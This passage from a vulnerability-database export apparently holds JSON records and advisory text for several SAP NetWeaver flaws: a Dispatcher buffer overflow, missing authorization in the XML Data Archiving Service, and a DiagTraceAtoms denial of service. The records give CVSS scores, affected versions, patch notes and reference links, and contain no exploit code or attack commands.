dashboards, manages risks, tasks, and can export \nresults to external systems. These features enable central management of \nSAP system security with minimal time and effort. \nWe follow the sun and function in two hubs located in the Netherlands \nand the US to operate local offices and partner network spanning 20+ \ncountries around the globe. This enables monitoring cyber threats in \nreal time and providing agile customer support. \n\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301\nPhone: 650.798.5255\nTwitter: @erpscan\nScoop-it: Business Application Security\nhttp://erpscan.com\n-- \n\u003chttps://www.linkedin.com/company/2217474?trk=ppro_cprof\u003e \n\u003chttps://twitter.com/erpscan\u003e\n\n\u003chttp://erpscan.com/\u003e\n\n------------------------------------------------------------------------\n\ne-mail: d.maenkova@erpscan.com \u003cmailto:d.maenkova@erpscan.com\u003e\n\naddress: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nphone: 650.798.5255\n\nerpscan.com \u003chttp://erpscan.com\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"db": "BID",
"id": "73897"
},
{
"db": "PACKETSTORM",
"id": "132353"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-2815",
"trust": 2.8
},
{
"db": "BID",
"id": "73897",
"trust": 1.3
},
{
"db": "PACKETSTORM",
"id": "132353",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002061",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201504-028",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "73897"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"db": "PACKETSTORM",
"id": "132353"
},
{
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
]
},
"id": "VAR-201504-0227",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:38:03.283000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2063369",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"db": "NVD",
"id": "CVE-2015-2815"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://erpscan.com/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/132353/sap-netweaver-dispatcher-buffer-overflow.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2015/jun/61"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/535825/100/800/threaded"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/73897"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2815"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2815"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2063369"
},
{
"trust": 0.1,
"url": "http://erpscan.com/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-2815"
},
{
"trust": 0.1,
"url": "https://twitter.com/erpscan\u003e"
},
{
"trust": 0.1,
"url": "https://www.linkedin.com/company/2217474?trk=ppro_cprof\u003e"
},
{
"trust": 0.1,
"url": "http://sap.com"
},
{
"trust": 0.1,
"url": "http://erpscan.com"
},
{
"trust": 0.1,
"url": "http://erpscan.com\u003e"
}
],
"sources": [
{
"db": "BID",
"id": "73897"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"db": "PACKETSTORM",
"id": "132353"
},
{
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "73897"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"db": "PACKETSTORM",
"id": "132353"
},
{
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-01T00:00:00",
"db": "BID",
"id": "73897"
},
{
"date": "2015-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"date": "2015-06-18T16:29:41",
"db": "PACKETSTORM",
"id": "132353"
},
{
"date": "2015-04-01T14:59:13.770000",
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"date": "2015-04-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-01T00:00:00",
"db": "BID",
"id": "73897"
},
{
"date": "2015-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"date": "2018-12-10T19:29:07.797000",
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"date": "2015-04-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "132353"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Kernel of NetWeaver Dispatcher of C_SAPGPARAM Buffer overflow vulnerability in functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
],
"trust": 0.6
}
}
var-201604-0202
Vulnerability from variot
The XML Data Archiving Service (XML DAS) in SAP NetWeaver AS Java does not check authorization, which allows remote authenticated users to obtain sensitive information, gain privileges, or possibly have unspecified other impact via requests to (1) webcontent/cas/cas_enter.jsp, (2) webcontent/cas/cas_validate.jsp, or (3) webcontent/aas/aas_store.jsp, aka SAP Security Note 1945215. SAP NetWeaver is a set of service-oriented integrated application platform from SAP (Germany), which provides a development and operating environment for SAP applications. SAP NetWeaver AS (Application Server) Java is an application server running on NetWeaver and based on the Java programming language. An unauthorized access vulnerability exists in SAP NetWeaver AS Java. An attacker could use this vulnerability to obtain sensitive information
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0202",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver as java",
"scope": null,
"trust": 0.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": null
}
],
"sources": [
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8840"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov of ERPScan",
"sources": [
{
"db": "BID",
"id": "77117"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-715"
}
],
"trust": 0.9
},
"cve": "CVE-2015-8840",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-8840",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-07260",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 6.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2015-8840",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-8840",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-8840",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2015-07260",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-100",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The XML Data Archiving Service (XML DAS) in SAP NetWeaver AS Java does not check authorization, which allows remote authenticated users to obtain sensitive information, gain privileges, or possibly have unspecified other impact via requests to (1) webcontent/cas/cas_enter.jsp, (2) webcontent/cas/cas_validate.jsp, or (3) webcontent/aas/aas_store.jsp, aka SAP Security Note 1945215. SAP NetWeaver is a set of service-oriented integrated application platform from SAP (Germany), which provides a development and operating environment for SAP applications. SAP NetWeaver AS (Application Server) Java is an application server running on NetWeaver and based on the Java programming language. \nAn unauthorized access vulnerability exists in SAP NetWeaver AS Java. An attacker could use this vulnerability to obtain sensitive information",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-715"
},
{
"db": "BID",
"id": "77117"
},
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
}
],
"trust": 3.15
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-8840",
"trust": 2.9
},
{
"db": "BID",
"id": "77117",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2015-07260",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201510-715",
"trust": 0.6
},
{
"db": "IVD",
"id": "4B143DC0-1E5B-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "BID",
"id": "77117"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-715"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"id": "VAR-201604-0202",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
}
]
},
"last_update_date": "2023-12-18T12:30:03.539000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Notes July 2015 (1945215)",
"trust": 0.8,
"url": "http://scn.sap.com/community/security/blog/2015/07/15/sap-security-notes-july-2015"
},
{
"title": "SAP NetWeaver AS JAVA Unauthorized Access Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/66158"
},
{
"title": "SAP NetWeaver AS Java XML Data Archiving Service Repair measures for service security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60831"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.0
},
{
"problemtype": "CWE-264",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "NVD",
"id": "CVE-2015-8840"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/community/security/blog/2015/07/15/sap-security-notes-july-2015"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-15-017-sap-netweaver-j2ee-das-service-unauthorized-access/"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/77117"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8840"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8840"
},
{
"trust": 0.8,
"url": "http://erpscan.com/advisories/erpscan-15-017-sap-netweaver-j2ee-das-service-unauthorized-access/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "BID",
"id": "77117"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-715"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "BID",
"id": "77117"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-715"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-11-05T00:00:00",
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"date": "2015-11-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"date": "2015-10-13T00:00:00",
"db": "BID",
"id": "77117"
},
{
"date": "2016-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"date": "2016-04-08T00:59:00.120000",
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"date": "2015-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-715"
},
{
"date": "2016-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-11-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"date": "2016-07-06T14:23:00",
"db": "BID",
"id": "77117"
},
{
"date": "2016-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007026"
},
{
"date": "2021-04-20T18:37:45.997000",
"db": "NVD",
"id": "CVE-2015-8840"
},
{
"date": "2015-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-715"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201510-715"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA Unauthorized Access Vulnerability",
"sources": [
{
"db": "IVD",
"id": "4b143dc0-1e5b-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2015-07260"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-715"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-100"
}
],
"trust": 0.6
}
}
var-201205-0129
Vulnerability from variot
The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch
TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities
SECUNIA ADVISORY ID: SA48980
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
RELEASE DATE: 2012-05-09
DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/48980/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.
The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies.
ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Advisory Information
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
